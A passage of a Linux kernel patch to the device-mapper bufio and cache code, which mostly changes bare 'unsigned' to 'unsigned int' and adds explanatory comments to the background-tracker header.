+@@ -220,7 +220,7 @@ static unsigned long global_num = 0;
+ /*
+  * Buffers are freed after this timeout
+  */
+-static unsigned dm_bufio_max_age = DM_BUFIO_DEFAULT_AGE_SECS;
++static unsigned int dm_bufio_max_age = DM_BUFIO_DEFAULT_AGE_SECS;
+ static unsigned long dm_bufio_retain_bytes = DM_BUFIO_DEFAULT_RETAIN_BYTES;
+ 
+ static unsigned long dm_bufio_peak_allocated;
+@@ -438,7 +438,7 @@ static void *alloc_buffer_data(struct dm_bufio_client *c, gfp_t gfp_mask,
+ 	 * as if GFP_NOIO was specified.
+ 	 */
+ 	if (gfp_mask & __GFP_NORETRY) {
+-		unsigned noio_flag = memalloc_noio_save();
++		unsigned int noio_flag = memalloc_noio_save();
+ 		void *ptr = __vmalloc(c->block_size, gfp_mask);
+ 
+ 		memalloc_noio_restore(noio_flag);
+@@ -591,7 +591,7 @@ static void dmio_complete(unsigned long error, void *context)
+ }
+ 
+ static void use_dmio(struct dm_buffer *b, enum req_op op, sector_t sector,
+-		     unsigned n_sectors, unsigned offset)
++		     unsigned int n_sectors, unsigned int offset)
+ {
+ 	int r;
+ 	struct dm_io_request io_req = {
+@@ -629,11 +629,11 @@ static void bio_complete(struct bio *bio)
+ }
+ 
+ static void use_bio(struct dm_buffer *b, enum req_op op, sector_t sector,
+-		    unsigned n_sectors, unsigned offset)
++		    unsigned int n_sectors, unsigned int offset)
+ {
+ 	struct bio *bio;
+ 	char *ptr;
+-	unsigned vec_size, len;
++	unsigned int vec_size, len;
+ 
+ 	vec_size = b->c->block_size >> PAGE_SHIFT;
+ 	if (unlikely(b->c->sectors_per_block_bits < PAGE_SHIFT - SECTOR_SHIFT))
+@@ -654,7 +654,7 @@ dmio:
+ 	len = n_sectors << SECTOR_SHIFT;
+ 
+ 	do {
+-		unsigned this_step = min((unsigned)(PAGE_SIZE - offset_in_page(ptr)), len);
++		unsigned int this_step = min((unsigned int)(PAGE_SIZE - offset_in_page(ptr)), len);
+ 		if (!bio_add_page(bio, virt_to_page(ptr), this_step,
+ 				  offset_in_page(ptr))) {
+ 			bio_put(bio);
+@@ -684,9 +684,9 @@ static inline sector_t block_to_sector(struct dm_bufio_client *c, sector_t block
+ static void submit_io(struct dm_buffer *b, enum req_op op,
+ 		      void (*end_io)(struct dm_buffer *, blk_status_t))
+ {
+-	unsigned n_sectors;
++	unsigned int n_sectors;
+ 	sector_t sector;
+-	unsigned offset, end;
++	unsigned int offset, end;
+ 
+ 	b->end_io = end_io;
+ 
+@@ -1156,7 +1156,7 @@ void *dm_bufio_new(struct dm_bufio_client *c, sector_t block,
+ EXPORT_SYMBOL_GPL(dm_bufio_new);
+ 
+ void dm_bufio_prefetch(struct dm_bufio_client *c,
+-		       sector_t block, unsigned n_blocks)
++		       sector_t block, unsigned int n_blocks)
+ {
+ 	struct blk_plug plug;
+ 
+@@ -1232,7 +1232,7 @@ void dm_bufio_release(struct dm_buffer *b)
+ EXPORT_SYMBOL_GPL(dm_bufio_release);
+ 
+ void dm_bufio_mark_partial_buffer_dirty(struct dm_buffer *b,
+-					unsigned start, unsigned end)
++					unsigned int start, unsigned int end)
+ {
+ 	struct dm_bufio_client *c = b->c;
+ 
+@@ -1529,13 +1529,13 @@ void dm_bufio_forget_buffers(struct dm_bufio_client *c, sector_t block, sector_t
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_forget_buffers);
+ 
+-void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned n)
++void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned int n)
+ {
+ 	c->minimum_buffers = n;
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_set_minimum_buffers);
+ 
+-unsigned dm_bufio_get_block_size(struct dm_bufio_client *c)
++unsigned int dm_bufio_get_block_size(struct dm_bufio_client *c)
+ {
+ 	return c->block_size;
+ }
+@@ -1734,15 +1734,15 @@ static unsigned long dm_bufio_shrink_count(struct shrinker *shrink, struct shrin
+ /*
+  * Create the buffering interface
+  */
+-struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsigned block_size,
+-					       unsigned reserved_buffers, unsigned aux_size,
++struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsigned int block_size,
++					       unsigned int reserved_buffers, unsigned int aux_size,
+ 					       void (*alloc_callback)(struct dm_buffer *),
+ 					       void (*write_callback)(struct dm_buffer *),
+ 					       unsigned int flags)
+ {
+ 	int r;
+ 	struct dm_bufio_client *c;
+-	unsigned i;
++	unsigned int i;
+ 	char slab_name[27];
+ 
+ 	if (!block_size || block_size & ((1 << SECTOR_SHIFT) - 1)) {
+@@ -1796,7 +1796,7 @@ struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsign
+ 
+ 	if (block_size <= KMALLOC_MAX_SIZE &&
+ 	    (block_size < PAGE_SIZE || !is_power_of_2(block_size))) {
+-		unsigned align = min(1U << __ffs(block_size), (unsigned)PAGE_SIZE);
++		unsigned int align = min(1U << __ffs(block_size), (unsigned int)PAGE_SIZE);
+ 		snprintf(slab_name, sizeof slab_name, "dm_bufio_cache-%u", block_size);
+ 		c->slab_cache = kmem_cache_create(slab_name, block_size, align,
+ 						  SLAB_RECLAIM_ACCOUNT, NULL);
+@@ -1872,7 +1872,7 @@ EXPORT_SYMBOL_GPL(dm_bufio_client_create);
+  */
+ void dm_bufio_client_destroy(struct dm_bufio_client *c)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	drop_buffers(c);
+ 
+@@ -1920,9 +1920,9 @@ void dm_bufio_set_sector_offset(struct dm_bufio_client *c, sector_t start)
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_set_sector_offset);
+ 
+-static unsigned get_max_age_hz(void)
++static unsigned int get_max_age_hz(void)
+ {
+-	unsigned max_age = READ_ONCE(dm_bufio_max_age);
++	unsigned int max_age = READ_ONCE(dm_bufio_max_age);
+ 
+ 	if (max_age > UINT_MAX / HZ)
+ 		max_age = UINT_MAX / HZ;
+@@ -1973,7 +1973,7 @@ static void do_global_cleanup(struct work_struct *w)
+ 	struct dm_bufio_client *locked_client = NULL;
+ 	struct dm_bufio_client *current_client;
+ 	struct dm_buffer *b;
+-	unsigned spinlock_hold_count;
++	unsigned int spinlock_hold_count;
+ 	unsigned long threshold = dm_bufio_cache_size -
+ 		dm_bufio_cache_size / DM_BUFIO_LOW_WATERMARK_RATIO;
+ 	unsigned long loops = global_num * 2;
+diff --git a/drivers/md/dm-cache-background-tracker.c b/drivers/md/dm-cache-background-tracker.c
+index 7887f99b82bd5..c606e6bfc3f8b 100644
+--- a/drivers/md/dm-cache-background-tracker.c
++++ b/drivers/md/dm-cache-background-tracker.c
+@@ -17,7 +17,7 @@ struct bt_work {
+ };
+ 
+ struct background_tracker {
+-	unsigned max_work;
++	unsigned int max_work;
+ 	atomic_t pending_promotes;
+ 	atomic_t pending_writebacks;
+ 	atomic_t pending_demotes;
+@@ -29,7 +29,7 @@ struct background_tracker {
+ 	struct kmem_cache *work_cache;
+ };
+ 
+-struct background_tracker *btracker_create(unsigned max_work)
++struct background_tracker *btracker_create(unsigned int max_work)
+ {
+ 	struct background_tracker *b = kmalloc(sizeof(*b), GFP_KERNEL);
+ 
+@@ -155,13 +155,13 @@ static void update_stats(struct background_tracker *b, struct policy_work *w, in
+ 	}
+ }
+ 
+-unsigned btracker_nr_writebacks_queued(struct background_tracker *b)
++unsigned int btracker_nr_writebacks_queued(struct background_tracker *b)
+ {
+ 	return atomic_read(&b->pending_writebacks);
+ }
+ EXPORT_SYMBOL_GPL(btracker_nr_writebacks_queued);
+ 
+-unsigned btracker_nr_demotions_queued(struct background_tracker *b)
++unsigned int btracker_nr_demotions_queued(struct background_tracker *b)
+ {
+ 	return atomic_read(&b->pending_demotes);
+ }
+diff --git a/drivers/md/dm-cache-background-tracker.h b/drivers/md/dm-cache-background-tracker.h
+index 27ab90dbc2752..14d3d53dc77a3 100644
+--- a/drivers/md/dm-cache-background-tracker.h
++++ b/drivers/md/dm-cache-background-tracker.h
+@@ -12,19 +12,44 @@
+ 
+ /*----------------------------------------------------------------*/
+ 
++/*
++ * The cache policy decides what background work should be performed,
++ * such as promotions, demotions and writebacks. The core cache target
++ * is in charge of performing the work, and does so when it sees fit.
++ *
++ * The background_tracker acts as a go between. Keeping track of future
++ * work that the policy has decided upon, and handing (issuing) it to
++ * the core target when requested.
++ *
++ * There is no locking in this, so calls will probably need to be
++ * protected with a spinlock.
++ */
++
+ struct background_work;
+ struct background_tracker;
+ 
+ /*
+- * FIXME: discuss lack of locking in all methods.
++ * Create a new tracker, it will not be able to queue more than
++ * 'max_work' entries.
++ */
++struct background_tracker *btracker_create(unsigned int max_work);
++
++/*
++ * Destroy the tracker. No issued, but not complete, work should
++ * exist when this is called. It is fine to have queued but unissued
++ * work.
+  */
+-struct background_tracker *btracker_create(unsigned max_work);
+ void btracker_destroy(struct background_tracker *b);
+ 
+-unsigned btracker_nr_writebacks_queued(struct background_tracker *b);
+-unsigned btracker_nr_demotions_queued(struct background_tracker *b);
++unsigned int btracker_nr_writebacks_queued(struct background_tracker *b);
++unsigned int btracker_nr_demotions_queued(struct background_tracker *b);
+ 
+ /*
++ * Queue some work within the tracker. 'work' should point to the work
++ * to queue, this will be copied (ownership doesn't pass).  If pwork
++ * is not NULL then it will be set to point to the tracker's internal
++ * copy of the work.
++ *
+  * returns -EINVAL iff the work is already queued.  -ENOMEM if the work
+  * couldn't be queued for another reason.
+  */
+@@ -33,11 +58,20 @@ int btracker_queue(struct background_tracker *b,
+ 		   struct policy_work **pwork);
+ 
+ /*
++ * Hands out the next piece of work to be performed.
+  * Returns -ENODATA if there's no work.
+  */
+ int btracker_issue(struct background_tracker *b, struct policy_work **work);
+-void btracker_complete(struct background_tracker *b,
+-		       struct policy_work *op);
++
++/*
++ * Informs the tracker that the work has been completed and it may forget
++ * about it.
++ */
++void btracker_complete(struct background_tracker *b, struct policy_work *op);
++
++/*
++ * Predicate to see if an origin block is already scheduled for promotion.
++ */
+ bool btracker_promotion_already_present(struct background_tracker *b,
+ 					dm_oblock_t oblock);
+ 
+diff --git a/drivers/md/dm-cache-metadata.c b/drivers/md/dm-cache-metadata.c
+index 83a5975bcc729..f5b4c996dc05f 100644
+--- a/drivers/md/dm-cache-metadata.c
++++ b/drivers/md/dm-cache-metadata.c
+@@ -104,7 +104,7 @@ struct dm_cache_metadata {
+ 	refcount_t ref_count;
+ 	struct list_head list;
+ 
+-	unsigned version;
++	unsigned int version;
+ 	struct block_device *bdev;
+ 	struct dm_block_manager *bm;
+ 	struct dm_space_map *metadata_sm;
+@@ -129,7 +129,7 @@ struct dm_cache_metadata {
+ 	bool clean_when_opened:1;
+ 
+ 	char policy_name[CACHE_POLICY_NAME_SIZE];
+-	unsigned policy_version[CACHE_POLICY_VERSION_SIZE];
++	unsigned int policy_version[CACHE_POLICY_VERSION_SIZE];
+ 	size_t policy_hint_size;
+ 	struct dm_cache_statistics stats;
+ 
+@@ -260,10 +260,10 @@ static int superblock_lock(struct dm_cache_metadata *cmd,
+ static int __superblock_all_zeroes(struct dm_block_manager *bm, bool *result)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	struct dm_block *b;
+ 	__le64 *data_le, zero = cpu_to_le64(0);
+-	unsigned sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
++	unsigned int sb_block_size = dm_bm_block_size(bm) / sizeof(__le64);
+ 
+ 	/*
+ 	 * We can't use a validator here - it may be all zeroes.
+@@ -727,7 +727,7 @@ static int __commit_transaction(struct dm_cache_metadata *cmd,
+  */
+ #define FLAGS_MASK ((1 << 16) - 1)
+ 
+-static __le64 pack_value(dm_oblock_t block, unsigned flags)
++static __le64 pack_value(dm_oblock_t block, unsigned int flags)
+ {
+ 	uint64_t value = from_oblock(block);
+ 	value <<= 16;
+@@ -735,7 +735,7 @@ static __le64 pack_value(dm_oblock_t block, unsigned flags)
+ 	return cpu_to_le64(value);
+ }
+ 
+-static void unpack_value(__le64 value_le, dm_oblock_t *block, unsigned *flags)
++static void unpack_value(__le64 value_le, dm_oblock_t *block, unsigned int *flags)
+ {
+ 	uint64_t value = le64_to_cpu(value_le);
+ 	uint64_t b = value >> 16;
+@@ -749,7 +749,7 @@ static struct dm_cache_metadata *metadata_open(struct block_device *bdev,
+ 					       sector_t data_block_size,
+ 					       bool may_format_device,
+ 					       size_t policy_hint_size,
+-					       unsigned metadata_version)
++					       unsigned int metadata_version)
+ {
+ 	int r;
+ 	struct dm_cache_metadata *cmd;
+@@ -810,7 +810,7 @@ static struct dm_cache_metadata *lookup_or_open(struct block_device *bdev,
+ 						sector_t data_block_size,
+ 						bool may_format_device,
+ 						size_t policy_hint_size,
+-						unsigned metadata_version)
++						unsigned int metadata_version)
+ {
+ 	struct dm_cache_metadata *cmd, *cmd2;
+ 
+@@ -855,7 +855,7 @@ struct dm_cache_metadata *dm_cache_metadata_open(struct block_device *bdev,
+ 						 sector_t data_block_size,
+ 						 bool may_format_device,
+ 						 size_t policy_hint_size,
+-						 unsigned metadata_version)
++						 unsigned int metadata_version)
+ {
+ 	struct dm_cache_metadata *cmd = lookup_or_open(bdev, data_block_size, may_format_device,
+ 						       policy_hint_size, metadata_version);
+@@ -890,7 +890,7 @@ static int block_clean_combined_dirty(struct dm_cache_metadata *cmd, dm_cblock_t
+ 	int r;
+ 	__le64 value;
+ 	dm_oblock_t ob;
+-	unsigned flags;
++	unsigned int flags;
+ 
+ 	r = dm_array_get_value(&cmd->info, cmd->root, from_cblock(b), &value);
+ 	if (r)
+@@ -1288,7 +1288,7 @@ static bool policy_unchanged(struct dm_cache_metadata *cmd,
+ 			     struct dm_cache_policy *policy)
+ {
+ 	const char *policy_name = dm_cache_policy_get_name(policy);
+-	const unsigned *policy_version = dm_cache_policy_get_version(policy);
++	const unsigned int *policy_version = dm_cache_policy_get_version(policy);
+ 	size_t policy_hint_size = dm_cache_policy_get_hint_size(policy);
+ 
+ 	/*
+@@ -1339,7 +1339,7 @@ static int __load_mapping_v1(struct dm_cache_metadata *cmd,
+ 	__le32 *hint_value_le;
+ 
+ 	dm_oblock_t oblock;
+-	unsigned flags;
++	unsigned int flags;
+ 	bool dirty = true;
+ 
+ 	dm_array_cursor_get_value(mapping_cursor, (void **) &mapping_value_le);
+@@ -1381,7 +1381,7 @@ static int __load_mapping_v2(struct dm_cache_metadata *cmd,
+ 	__le32 *hint_value_le;
+ 
+ 	dm_oblock_t oblock;
+-	unsigned flags;
++	unsigned int flags;
+ 	bool dirty = true;
+ 
+ 	dm_array_cursor_get_value(mapping_cursor, (void **) &mapping_value_le);
+@@ -1513,7 +1513,7 @@ static int __dump_mapping(void *context, uint64_t cblock, void *leaf)
+ {
+ 	__le64 value;
+ 	dm_oblock_t oblock;
+-	unsigned flags;
++	unsigned int flags;
+ 
+ 	memcpy(&value, leaf, sizeof(value));
+ 	unpack_value(value, &oblock, &flags);
+@@ -1547,7 +1547,7 @@ int dm_cache_changed_this_transaction(struct dm_cache_metadata *cmd)
+ static int __dirty(struct dm_cache_metadata *cmd, dm_cblock_t cblock, bool dirty)
+ {
+ 	int r;
+-	unsigned flags;
++	unsigned int flags;
+ 	dm_oblock_t oblock;
+ 	__le64 value;
+ 
+@@ -1574,10 +1574,10 @@ static int __dirty(struct dm_cache_metadata *cmd, dm_cblock_t cblock, bool dirty
+ 
+ }
+ 
+-static int __set_dirty_bits_v1(struct dm_cache_metadata *cmd, unsigned nr_bits, unsigned long *bits)
++static int __set_dirty_bits_v1(struct dm_cache_metadata *cmd, unsigned int nr_bits, unsigned long *bits)
+ {
+ 	int r;
+-	unsigned i;
++	unsigned int i;
+ 	for (i = 0; i < nr_bits; i++) {
+ 		r = __dirty(cmd, to_cblock(i), test_bit(i, bits));
+ 		if (r)
+@@ -1594,7 +1594,7 @@ static int is_dirty_callback(uint32_t index, bool *value, void *context)
+ 	return 0;
+ }
+ 
+-static int __set_dirty_bits_v2(struct dm_cache_metadata *cmd, unsigned nr_bits, unsigned long *bits)
++static int __set_dirty_bits_v2(struct dm_cache_metadata *cmd, unsigned int nr_bits, unsigned long *bits)
+ {
+ 	int r = 0;
+ 
+@@ -1613,7 +1613,7 @@ static int __set_dirty_bits_v2(struct dm_cache_metadata *cmd, unsigned nr_bits,
+ }
+ 
+ int dm_cache_set_dirty_bits(struct dm_cache_metadata *cmd,
+-			    unsigned nr_bits,
++			    unsigned int nr_bits,
+ 			    unsigned long *bits)
+ {
+ 	int r;
+@@ -1712,7 +1712,7 @@ static int write_hints(struct dm_cache_metadata *cmd, struct dm_cache_policy *po
+ 	int r;
+ 	size_t hint_size;
+ 	const char *policy_name = dm_cache_policy_get_name(policy);
+-	const unsigned *policy_version = dm_cache_policy_get_version(policy);
++	const unsigned int *policy_version = dm_cache_policy_get_version(policy);
+ 
+ 	if (!policy_name[0] ||
+ 	    (strlen(policy_name) > sizeof(cmd->policy_name) - 1))
+diff --git a/drivers/md/dm-cache-metadata.h b/drivers/md/dm-cache-metadata.h
+index 0905f2c1615e1..b40322bc44cf7 100644
+--- a/drivers/md/dm-cache-metadata.h
++++ b/drivers/md/dm-cache-metadata.h
+@@ -60,7 +60,7 @@ struct dm_cache_metadata *dm_cache_metadata_open(struct block_device *bdev,
+ 						 sector_t data_block_size,
+ 						 bool may_format_device,
+ 						 size_t policy_hint_size,
+-						 unsigned metadata_version);
++						 unsigned int metadata_version);
+ 
+ void dm_cache_metadata_close(struct dm_cache_metadata *cmd);
+ 
+@@ -96,7 +96,7 @@ int dm_cache_load_mappings(struct dm_cache_metadata *cmd,
+ 			   void *context);
+ 
+ int dm_cache_set_dirty_bits(struct dm_cache_metadata *cmd,
+-			    unsigned nr_bits, unsigned long *bits);
++			    unsigned int nr_bits, unsigned long *bits);
+ 
+ struct dm_cache_statistics {
+ 	uint32_t read_hits;
+diff --git a/drivers/md/dm-cache-policy-internal.h b/drivers/md/dm-cache-policy-internal.h
+index 56f0a23f698c0..8e49baa78dc19 100644
+--- a/drivers/md/dm-cache-policy-internal.h
++++ b/drivers/md/dm-cache-policy-internal.h
+@@ -85,7 +85,7 @@ static inline void policy_tick(struct dm_cache_policy *p, bool can_block)
+ }
+ 
+ static inline int policy_emit_config_values(struct dm_cache_policy *p, char *result,
+-					    unsigned maxlen, ssize_t *sz_ptr)
++					    unsigned int maxlen, ssize_t *sz_ptr)
+ {
+ 	ssize_t sz = *sz_ptr;
+ 	if (p->emit_config_values)
+@@ -112,18 +112,18 @@ static inline void policy_allow_migrations(struct dm_cache_policy *p, bool allow
+ /*
+  * Some utility functions commonly used by policies and the core target.
+  */
+-static inline size_t bitset_size_in_bytes(unsigned nr_entries)
++static inline size_t bitset_size_in_bytes(unsigned int nr_entries)
+ {
+ 	return sizeof(unsigned long) * dm_div_up(nr_entries, BITS_PER_LONG);
+ }
+ 
+-static inline unsigned long *alloc_bitset(unsigned nr_entries)
++static inline unsigned long *alloc_bitset(unsigned int nr_entries)
+ {
+ 	size_t s = bitset_size_in_bytes(nr_entries);
+ 	return vzalloc(s);
+ }
+ 
+-static inline void clear_bitset(void *bitset, unsigned nr_entries)
++static inline void clear_bitset(void *bitset, unsigned int nr_entries)
+ {
+ 	size_t s = bitset_size_in_bytes(nr_entries);
+ 	memset(bitset, 0, s);
+@@ -154,7 +154,7 @@ void dm_cache_policy_destroy(struct dm_cache_policy *p);
+  */
+ const char *dm_cache_policy_get_name(struct dm_cache_policy *p);
+ 
+-const unsigned *dm_cache_policy_get_version(struct dm_cache_policy *p);
++const unsigned int *dm_cache_policy_get_version(struct dm_cache_policy *p);
+ 
+ size_t dm_cache_policy_get_hint_size(struct dm_cache_policy *p);
+ 
+diff --git a/drivers/md/dm-cache-policy-smq.c b/drivers/md/dm-cache-policy-smq.c
+index a3d281fc14c3a..54343812223e8 100644
+--- a/drivers/md/dm-cache-policy-smq.c
++++ b/drivers/md/dm-cache-policy-smq.c
+@@ -23,12 +23,12 @@
+ /*
+  * Safe division functions that return zero on divide by zero.
+  */
+-static unsigned safe_div(unsigned n, unsigned d)
++static unsigned int safe_div(unsigned int n, unsigned int d)
+ {
+ 	return d ? n / d : 0u;
+ }
+ 
+-static unsigned safe_mod(unsigned n, unsigned d)
++static unsigned int safe_mod(unsigned int n, unsigned int d)
+ {
+ 	return d ? n % d : 0u;
+ }
+@@ -36,10 +36,10 @@ static unsigned safe_mod(unsigned n, unsigned d)
+ /*----------------------------------------------------------------*/
+ 
+ struct entry {
+-	unsigned hash_next:28;
+-	unsigned prev:28;
+-	unsigned next:28;
+-	unsigned level:6;
++	unsigned int hash_next:28;
++	unsigned int prev:28;
++	unsigned int next:28;
++	unsigned int level:6;
+ 	bool dirty:1;
+ 	bool allocated:1;
+ 	bool sentinel:1;
+@@ -62,7 +62,7 @@ struct entry_space {
+ 	struct entry *end;
+ };
+ 
+-static int space_init(struct entry_space *es, unsigned nr_entries)
++static int space_init(struct entry_space *es, unsigned int nr_entries)
+ {
+ 	if (!nr_entries) {
+ 		es->begin = es->end = NULL;
+@@ -82,7 +82,7 @@ static void space_exit(struct entry_space *es)
+ 	vfree(es->begin);
+ }
+ 
+-static struct entry *__get_entry(struct entry_space *es, unsigned block)
++static struct entry *__get_entry(struct entry_space *es, unsigned int block)
+ {
+ 	struct entry *e;
+ 
+@@ -92,13 +92,13 @@ static struct entry *__get_entry(struct entry_space *es, unsigned block)
+ 	return e;
+ }
+ 
+-static unsigned to_index(struct entry_space *es, struct entry *e)
++static unsigned int to_index(struct entry_space *es, struct entry *e)
+ {
+ 	BUG_ON(e < es->begin || e >= es->end);
+ 	return e - es->begin;
+ }
+ 
+-static struct entry *to_entry(struct entry_space *es, unsigned block)
++static struct entry *to_entry(struct entry_space *es, unsigned int block)
+ {
+ 	if (block == INDEXER_NULL)
+ 		return NULL;
+@@ -109,8 +109,8 @@ static struct entry *to_entry(struct entry_space *es, unsigned block)
+ /*----------------------------------------------------------------*/
+ 
+ struct ilist {
+-	unsigned nr_elts;	/* excluding sentinel entries */
+-	unsigned head, tail;
++	unsigned int nr_elts;	/* excluding sentinel entries */
++	unsigned int head, tail;
+ };
+ 
+ static void l_init(struct ilist *l)
+@@ -252,23 +252,23 @@ static struct entry *l_pop_tail(struct entry_space *es, struct ilist *l)
+ struct queue {
+ 	struct entry_space *es;
+ 
+-	unsigned nr_elts;
+-	unsigned nr_levels;
++	unsigned int nr_elts;
++	unsigned int nr_levels;
+ 	struct ilist qs[MAX_LEVELS];
+ 
+ 	/*
+ 	 * We maintain a count of the number of entries we would like in each
+ 	 * level.
+ 	 */
+-	unsigned last_target_nr_elts;
+-	unsigned nr_top_levels;
+-	unsigned nr_in_top_levels;
+-	unsigned target_count[MAX_LEVELS];
++	unsigned int last_target_nr_elts;
++	unsigned int nr_top_levels;
++	unsigned int nr_in_top_levels;
++	unsigned int target_count[MAX_LEVELS];
+ };
+ 
+-static void q_init(struct queue *q, struct entry_space *es, unsigned nr_levels)
++static void q_init(struct queue *q, struct entry_space *es, unsigned int nr_levels)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	q->es = es;
+ 	q->nr_elts = 0;
+@@ -284,7 +284,7 @@ static void q_init(struct queue *q, struct entry_space *es, unsigned nr_levels)
+ 	q->nr_in_top_levels = 0u;
+ }
+ 
+-static unsigned q_size(struct queue *q)
++static unsigned int q_size(struct queue *q)
+ {
+ 	return q->nr_elts;
+ }
+@@ -332,9 +332,9 @@ static void q_del(struct queue *q, struct entry *e)
+ /*
+  * Return the oldest entry of the lowest populated level.
+  */
+-static struct entry *q_peek(struct queue *q, unsigned max_level, bool can_cross_sentinel)
++static struct entry *q_peek(struct queue *q, unsigned int max_level, bool can_cross_sentinel)
+ {
+-	unsigned level;
++	unsigned int level;
+ 	struct entry *e;
+ 
+ 	max_level = min(max_level, q->nr_levels);
+@@ -369,7 +369,7 @@ static struct entry *q_pop(struct queue *q)
+  * used by redistribute, so we know this is true.  It also doesn't adjust
+  * the q->nr_elts count.
+  */
+-static struct entry *__redist_pop_from(struct queue *q, unsigned level)
++static struct entry *__redist_pop_from(struct queue *q, unsigned int level)
+ {
+ 	struct entry *e;
+ 
+@@ -383,9 +383,10 @@ static struct entry *__redist_pop_from(struct queue *q, unsigned level)
+ 	return NULL;
+ }
+ 
+-static void q_set_targets_subrange_(struct queue *q, unsigned nr_elts, unsigned lbegin, unsigned lend)
++static void q_set_targets_subrange_(struct queue *q, unsigned int nr_elts,
++				    unsigned int lbegin, unsigned int lend)
+ {
+-	unsigned level, nr_levels, entries_per_level, remainder;
++	unsigned int level, nr_levels, entries_per_level, remainder;
+ 
+ 	BUG_ON(lbegin > lend);
+ 	BUG_ON(lend > q->nr_levels);
+@@ -426,7 +427,7 @@ static void q_set_targets(struct queue *q)
+ 
+ static void q_redistribute(struct queue *q)
+ {
+-	unsigned target, level;
++	unsigned int target, level;
+ 	struct ilist *l, *l_above;
+ 	struct entry *e;
+ 
+@@ -467,12 +468,12 @@ static void q_redistribute(struct queue *q)
+ 	}
+ }
+ 
+-static void q_requeue(struct queue *q, struct entry *e, unsigned extra_levels,
++static void q_requeue(struct queue *q, struct entry *e, unsigned int extra_levels,
+ 		      struct entry *s1, struct entry *s2)
+ {
+ 	struct entry *de;
+-	unsigned sentinels_passed = 0;
+-	unsigned new_level = min(q->nr_levels - 1u, e->level + extra_levels);
++	unsigned int sentinels_passed = 0;
++	unsigned int new_level = min(q->nr_levels - 1u, e->level + extra_levels);
+ 
+ 	/* try and find an entry to swap with */
+ 	if (extra_levels && (e->level < q->nr_levels - 1u)) {
+@@ -512,9 +513,9 @@ static void q_requeue(struct queue *q, struct entry *e, unsigned extra_levels,
+ #define EIGHTH (1u << (FP_SHIFT - 3u))
+ 
+ struct stats {
+-	unsigned hit_threshold;
+-	unsigned hits;
+-	unsigned misses;
++	unsigned int hit_threshold;
++	unsigned int hits;
++	unsigned int misses;
+ };
+ 
+ enum performance {
+@@ -523,7 +524,7 @@ enum performance {
+ 	Q_WELL
+ };
+ 
+-static void stats_init(struct stats *s, unsigned nr_levels)
++static void stats_init(struct stats *s, unsigned int nr_levels)
+ {
+ 	s->hit_threshold = (nr_levels * 3u) / 4u;
+ 	s->hits = 0u;
+@@ -535,7 +536,7 @@ static void stats_reset(struct stats *s)
+ 	s->hits = s->misses = 0u;
+ }
+ 
+-static void stats_level_accessed(struct stats *s, unsigned level)
++static void stats_level_accessed(struct stats *s, unsigned int level)
+ {
+ 	if (level >= s->hit_threshold)
+ 		s->hits++;
+@@ -556,7 +557,7 @@ static void stats_miss(struct stats *s)
+  */
+ static enum performance stats_assess(struct stats *s)
+ {
+-	unsigned confidence = safe_div(s->hits << FP_SHIFT, s->hits + s->misses);
++	unsigned int confidence = safe_div(s->hits << FP_SHIFT, s->hits + s->misses);
+ 
+ 	if (confidence < SIXTEENTH)
+ 		return Q_POOR;
+@@ -573,16 +574,16 @@ static enum performance stats_assess(struct stats *s)
+ struct smq_hash_table {
+ 	struct entry_space *es;
+ 	unsigned long long hash_bits;
+-	unsigned *buckets;
++	unsigned int *buckets;
+ };
+ 
+ /*
+  * All cache entries are stored in a chained hash table.  To save space we
+  * use indexing again, and only store indexes to the next entry.
+  */
+-static int h_init(struct smq_hash_table *ht, struct entry_space *es, unsigned nr_entries)
++static int h_init(struct smq_hash_table *ht, struct entry_space *es, unsigned int nr_entries)
+ {
+-	unsigned i, nr_buckets;
++	unsigned int i, nr_buckets;
+ 
+ 	ht->es = es;
+ 	nr_buckets = roundup_pow_of_two(max(nr_entries / 4u, 16u));
+@@ -603,7 +604,7 @@ static void h_exit(struct smq_hash_table *ht)
+ 	vfree(ht->buckets);
+ }
+ 
+-static struct entry *h_head(struct smq_hash_table *ht, unsigned bucket)
++static struct entry *h_head(struct smq_hash_table *ht, unsigned int bucket)
+ {
+ 	return to_entry(ht->es, ht->buckets[bucket]);
+ }
+@@ -613,7 +614,7 @@ static struct entry *h_next(struct smq_hash_table *ht, struct entry *e)
+ 	return to_entry(ht->es, e->hash_next);
+ }
+ 
+-static void __h_insert(struct smq_hash_table *ht, unsigned bucket, struct entry *e)
++static void __h_insert(struct smq_hash_table *ht, unsigned int bucket, struct entry *e)
+ {
+ 	e->hash_next = ht->buckets[bucket];
+ 	ht->buckets[bucket] = to_index(ht->es, e);
+@@ -621,11 +622,11 @@ static void __h_insert(struct smq_hash_table *ht, unsigned bucket, struct entry
+ 
+ static void h_insert(struct smq_hash_table *ht, struct entry *e)
+ {
+-	unsigned h = hash_64(from_oblock(e->oblock), ht->hash_bits);
++	unsigned int h = hash_64(from_oblock(e->oblock), ht->hash_bits);
+ 	__h_insert(ht, h, e);
+ }
+ 
+-static struct entry *__h_lookup(struct smq_hash_table *ht, unsigned h, dm_oblock_t oblock,
++static struct entry *__h_lookup(struct smq_hash_table *ht, unsigned int h, dm_oblock_t oblock,
+ 				struct entry **prev)
+ {
+ 	struct entry *e;
+@@ -641,7 +642,7 @@ static struct entry *__h_lookup(struct smq_hash_table *ht, unsigned h, dm_oblock
+ 	return NULL;
+ }
+ 
+-static void __h_unlink(struct smq_hash_table *ht, unsigned h,
++static void __h_unlink(struct smq_hash_table *ht, unsigned int h,
+ 		       struct entry *e, struct entry *prev)
+ {
+ 	if (prev)
+@@ -656,7 +657,7 @@ static void __h_unlink(struct smq_hash_table *ht, unsigned h,
+ static struct entry *h_lookup(struct smq_hash_table *ht, dm_oblock_t oblock)
+ {
+ 	struct entry *e, *prev;
+-	unsigned h = hash_64(from_oblock(oblock), ht->hash_bits);
++	unsigned int h = hash_64(from_oblock(oblock), ht->hash_bits);
+ 
+ 	e = __h_lookup(ht, h, oblock, &prev);
+ 	if (e && prev) {
